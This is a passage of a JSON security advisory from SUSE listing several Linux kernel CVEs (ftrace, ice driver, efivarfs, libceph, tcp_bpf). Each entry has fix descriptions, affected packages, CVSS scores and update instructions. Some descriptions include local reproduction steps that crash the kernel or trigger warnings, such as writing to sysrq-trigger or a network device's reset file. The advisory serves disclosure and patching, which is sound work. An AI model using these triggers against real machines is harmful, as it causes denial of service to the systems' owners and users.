"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nftrace: Fix potential warning in trace_printk_seq during ftrace_dump\n\nWhen calling ftrace_dump_one() concurrently with reading trace_pipe,\na WARN_ON_ONCE() in trace_printk_seq() can be triggered due to a race\ncondition.\n\nThe issue occurs because:\n\nCPU0 (ftrace_dump) CPU1 (reader)\necho z \u003e /proc/sysrq-trigger\n\n!trace_empty(\u0026iter)\ntrace_iterator_reset(\u0026iter) \u003c- len = size = 0\n cat /sys/kernel/tracing/trace_pipe\ntrace_find_next_entry_inc(\u0026iter)\n __find_next_entry\n ring_buffer_empty_cpu \u003c- all empty\n return NULL\n\ntrace_printk_seq(\u0026iter.seq)\n WARN_ON_ONCE(s-\u003eseq.len \u003e= s-\u003eseq.size)\n\nIn the context between trace_empty() and trace_find_next_entry_inc()\nduring ftrace_dump, the ring buffer data was consumed by other readers.\nThis caused trace_find_next_entry_inc to return NULL, failing to populate\n`iter.seq`. At this point, due to the prior trace_iterator_reset, both\n`iter.seq.len` and `iter.seq.size` were set to 0. Since they are equal,\nthe WARN_ON_ONCE condition is triggered.\n\nMove the trace_printk_seq() into the if block that checks to make sure the\nreturn value of trace_find_next_entry_inc() is non-NULL in\nftrace_dump_one(), ensuring the \u0027iter.seq\u0027 is properly populated before\nsubsequent operations.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39813",
"url": "https://www.suse.com/security/cve/CVE-2025-39813"
},
{
"category": "external",
"summary": "SUSE Bug 1250032 for CVE-2025-39813",
"url": "https://bugzilla.suse.com/1250032"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-39813"
},
{
"cve": "CVE-2025-39814",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39814"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nice: fix NULL pointer dereference in ice_unplug_aux_dev() on reset\n\nIssuing a reset when the driver is loaded without RDMA support, will\nresults in a crash as it attempts to remove RDMA\u0027s non-existent auxbus\ndevice:\necho 1 \u003e /sys/class/net/\u003cif\u003e/device/reset\n\nBUG: kernel NULL pointer dereference, address: 0000000000000008\n...\nRIP: 0010:ice_unplug_aux_dev+0x29/0x70 [ice]\n...\nCall Trace:\n\u003cTASK\u003e\nice_prepare_for_reset+0x77/0x260 [ice]\npci_dev_save_and_disable+0x2c/0x70\npci_reset_function+0x88/0x130\nreset_store+0x5a/0xa0\nkernfs_fop_write_iter+0x15e/0x210\nvfs_write+0x273/0x520\nksys_write+0x6b/0xe0\ndo_syscall_64+0x79/0x3b0\nentry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nice_unplug_aux_dev() checks pf-\u003ecdev_info-\u003eadev for NULL pointer, but\npf-\u003ecdev_info will also be NULL, leading to the deref in the trace above.\n\nIntroduce a flag to be set when the creation of the auxbus device is\nsuccessful, to avoid multiple NULL pointer checks in ice_unplug_aux_dev().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39814",
"url": "https://www.suse.com/security/cve/CVE-2025-39814"
},
{
"category": "external",
"summary": "SUSE Bug 1249895 for CVE-2025-39814",
"url": "https://bugzilla.suse.com/1249895"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-39814"
},
{
"cve": "CVE-2025-39817",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39817"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nefivarfs: Fix slab-out-of-bounds in efivarfs_d_compare\n\nObserved on kernel 6.6 (present on master as well):\n\n BUG: KASAN: slab-out-of-bounds in memcmp+0x98/0xd0\n Call trace:\n kasan_check_range+0xe8/0x190\n __asan_loadN+0x1c/0x28\n memcmp+0x98/0xd0\n efivarfs_d_compare+0x68/0xd8\n __d_lookup_rcu_op_compare+0x178/0x218\n __d_lookup_rcu+0x1f8/0x228\n d_alloc_parallel+0x150/0x648\n lookup_open.isra.0+0x5f0/0x8d0\n open_last_lookups+0x264/0x828\n path_openat+0x130/0x3f8\n do_filp_open+0x114/0x248\n do_sys_openat2+0x340/0x3c0\n __arm64_sys_openat+0x120/0x1a0\n\nIf dentry-\u003ed_name.len \u003c EFI_VARIABLE_GUID_LEN , \u0027guid\u0027 can become\nnegative, leadings to oob. The issue can be triggered by parallel\nlookups using invalid filename:\n\n T1\t\t\tT2\n lookup_open\n -\u003elookup\n simple_lookup\n d_add\n // invalid dentry is added to hash list\n\n\t\t\tlookup_open\n\t\t\t d_alloc_parallel\n\t\t\t __d_lookup_rcu\n\t\t\t __d_lookup_rcu_op_compare\n\t\t\t hlist_bl_for_each_entry_rcu\n\t\t\t // invalid dentry can be retrieved\n\t\t\t -\u003ed_compare\n\t\t\t efivarfs_d_compare\n\t\t\t // oob\n\nFix it by checking \u0027guid\u0027 before cmp.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39817",
"url": "https://www.suse.com/security/cve/CVE-2025-39817"
},
{
"category": "external",
"summary": "SUSE Bug 1249998 for CVE-2025-39817",
"url": "https://bugzilla.suse.com/1249998"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-39817"
},
{
"cve": "CVE-2025-39829",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39829"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntrace/fgraph: Fix the warning caused by missing unregister notifier\n\nThis warning was triggered during testing on v6.16:\n\nnotifier callback ftrace_suspend_notifier_call already registered\nWARNING: CPU: 2 PID: 86 at kernel/notifier.c:23 notifier_chain_register+0x44/0xb0\n...\nCall Trace:\n \u003cTASK\u003e\n blocking_notifier_chain_register+0x34/0x60\n register_ftrace_graph+0x330/0x410\n ftrace_profile_write+0x1e9/0x340\n vfs_write+0xf8/0x420\n ? filp_flush+0x8a/0xa0\n ? filp_close+0x1f/0x30\n ? do_dup2+0xaf/0x160\n ksys_write+0x65/0xe0\n do_syscall_64+0xa4/0x260\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nWhen writing to the function_profile_enabled interface, the notifier was\nnot unregistered after start_graph_tracing failed, causing a warning the\nnext time function_profile_enabled was written.\n\nFixed by adding unregister_pm_notifier in the exception path.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39829",
"url": "https://www.suse.com/security/cve/CVE-2025-39829"
},
{
"category": "external",
"summary": "SUSE Bug 1250082 for CVE-2025-39829",
"url": "https://bugzilla.suse.com/1250082"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-39829"
},
{
"cve": "CVE-2025-39880",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39880"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix invalid accesses to ceph_connection_v1_info\n\nThere is a place where generic code in messenger.c is reading and\nanother place where it is writing to con-\u003ev1 union member without\nchecking that the union member is active (i.e. msgr1 is in use).\n\nOn 64-bit systems, con-\u003ev1.auth_retry overlaps with con-\u003ev2.out_iter,\nso such a read is almost guaranteed to return a bogus value instead of\n0 when msgr2 is in use. This ends up being fairly benign because the\nside effect is just the invalidation of the authorizer and successive\nfetching of new tickets.\n\ncon-\u003ev1.connect_seq overlaps with con-\u003ev2.conn_bufs and the fact that\nit\u0027s being written to can cause more serious consequences, but luckily\nit\u0027s not something that happens often.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39880",
"url": "https://www.suse.com/security/cve/CVE-2025-39880"
},
{
"category": "external",
"summary": "SUSE Bug 1250388 for CVE-2025-39880",
"url": "https://bugzilla.suse.com/1250388"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-39880"
},
{
"cve": "CVE-2025-39913",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39913"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp_bpf: Call sk_msg_free() when tcp_bpf_send_verdict() fails to allocate psock-\u003ecork.\n\nsyzbot reported the splat below. [0]\n\nThe repro does the following:\n\n 1. Load a sk_msg prog that calls bpf_msg_cork_bytes(msg, cork_bytes)\n 2. Attach the prog to a SOCKMAP\n 3. Add a socket to the SOCKMAP\n 4. Activate fault injection\n 5. Send data less than cork_bytes\n\nAt 5., the data is carried over to the next sendmsg() as it is\nsmaller than the cork_bytes specified by bpf_msg_cork_bytes().\n\nThen, tcp_bpf_send_verdict() tries to allocate psock-\u003ecork to hold\nthe data, but this fails silently due to fault injection + __GFP_NOWARN.\n\nIf the allocation fails, we need to revert the sk-\u003esk_forward_alloc\nchange done by sk_msg_alloc().\n\nLet\u0027s call sk_msg_free() when tcp_bpf_send_verdict fails to allocate\npsock-\u003ecork.\n\nThe \"*copied\" also needs to be updated such that a proper error can\nbe returned to the caller, sendmsg. It fails to allocate psock-\u003ecork.\nNothing has been corked so far, so this patch simply sets \"*copied\"\nto 0.\n\n[0]:\nWARNING: net/ipv4/af_inet.c:156 at inet_sock_destruct+0x623/0x730 net/ipv4/af_inet.c:156, CPU#1: syz-executor/5983\nModules linked in:\nCPU: 1 UID: 0 PID: 5983 Comm: syz-executor Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/12/2025\nRIP: 0010:inet_sock_destruct+0x623/0x730 net/ipv4/af_inet.c:156\nCode: 0f 0b 90 e9 62 fe ff ff e8 7a db b5 f7 90 0f 0b 90 e9 95 fe ff ff e8 6c db b5 f7 90 0f 0b 90 e9 bb fe ff ff e8 5e db b5 f7 90 \u003c0f\u003e 0b 90 e9 e1 fe ff ff 89 f9 80 e1 07 80 c1 03 38 c1 0f 8c 9f fc\nRSP: 0018:ffffc90000a08b48 EFLAGS: 00010246\nRAX: ffffffff8a09d0b2 RBX: dffffc0000000000 RCX: ffff888024a23c80\nRDX: 0000000000000100 RSI: 0000000000000fff RDI: 0000000000000000\nRBP: 0000000000000fff R08: ffff88807e07c627 R09: 1ffff1100fc0f8c4\nR10: dffffc0000000000 R11: ffffed100fc0f8c5 R12: ffff88807e07c380\nR13: dffffc0000000000 R14: ffff88807e07c60c R15: 1ffff1100fc0f872\nFS: 00005555604c4500(0000) GS:ffff888125af1000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00005555604df5c8 CR3: 0000000032b06000 CR4: 00000000003526f0\nCall Trace:\n \u003cIRQ\u003e\n __sk_destruct+0x86/0x660 net/core/sock.c:2339\n rcu_do_batch kernel/rcu/tree.c:2605 [inline]\n rcu_core+0xca8/0x1770 kernel/rcu/tree.c:2861\n handle_softirqs+0x286/0x870 kernel/softirq.c:579\n __do_softirq kernel/softirq.c:613 [inline]\n invoke_softirq kernel/softirq.c:453 [inline]\n __irq_exit_rcu+0xca/0x1f0 kernel/softirq.c:680\n irq_exit_rcu+0x9/0x30 kernel/softirq.c:696\n instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1052 [inline]\n sysvec_apic_timer_interrupt+0xa6/0xc0 arch/x86/kernel/apic/apic.c:1052\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
